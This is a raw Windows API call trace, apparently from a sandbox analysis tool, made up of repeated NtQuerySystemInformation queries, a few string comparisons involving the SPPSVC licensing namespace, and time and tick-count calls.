[0229.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3d0, Length=0x38, ResultLength=0x0) [0229.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.863] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x28, ResultLength=0x0) [0229.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x28, ResultLength=0x0) [0229.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3d0, Length=0x38, ResultLength=0x0) [0229.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x20, ResultLength=0x0) [0229.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0229.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.865] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0229.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0229.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3d0, Length=0x38, ResultLength=0x0) [0229.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x20, ResultLength=0x0) [0229.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x20, ResultLength=0x0) [0229.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x20, ResultLength=0x0) [0229.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.866] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0229.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.867] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0229.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0229.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0229.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0229.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0229.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x28, ResultLength=0x0) [0229.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0229.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0229.892] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0229.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0229.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x20, ResultLength=0x0) [0229.893] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0229.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0229.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0229.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0229.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x20, ResultLength=0x0) [0229.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0229.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0229.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.895] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd338, Length=0x50, ResultLength=0x0) [0229.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x38, ResultLength=0x0) [0229.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0229.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0229.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0229.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.897] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0229.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x38, ResultLength=0x0) [0229.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0229.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0229.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x38, ResultLength=0x0) [0229.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0229.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0229.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0229.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0229.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x38, ResultLength=0x0) [0229.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0229.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0229.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0229.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd648, Length=0x50, ResultLength=0x0) [0229.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5c0, Length=0x28, ResultLength=0x0) [0229.904] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd648, Length=0x50, ResultLength=0x0) [0229.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd648, Length=0x50, ResultLength=0x0) [0229.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0229.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0229.904] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0229.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0229.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.904] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0229.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0229.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.905] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x38, ResultLength=0x0) [0229.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0229.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0229.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0229.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd300, Length=0x28, ResultLength=0x0) [0229.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.907] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x38, ResultLength=0x0) [0229.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd380, Length=0x28, ResultLength=0x0) [0229.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.912] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd380, Length=0x28, ResultLength=0x0) [0229.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x38, ResultLength=0x0) [0229.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2e0, Length=0x20, ResultLength=0x0) [0229.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x20, ResultLength=0x0) [0229.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.913] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x20, ResultLength=0x0) [0229.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x20, ResultLength=0x0) [0229.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x38, ResultLength=0x0) [0229.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2e0, Length=0x20, ResultLength=0x0) [0229.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x20, ResultLength=0x0) [0229.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x20, ResultLength=0x0) [0229.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.914] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.915] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xc7520fd590 | out: lpSystemTimeAsFileTime=0xc7520fd590*(dwLowDateTime=0xea5169e1, dwHighDateTime=0x1d5fb6e)) [0229.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd648, Length=0x50, ResultLength=0x0) [0229.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd580, Length=0x28, ResultLength=0x0) [0229.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd498, Length=0x50, ResultLength=0x0) [0229.915] GetTickCount () returned 0x117a088 [0229.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd368, Length=0x58, ResultLength=0x0) [0229.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0229.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0229.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.917] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0229.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0229.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0229.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x28, ResultLength=0x0) [0229.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0229.918] 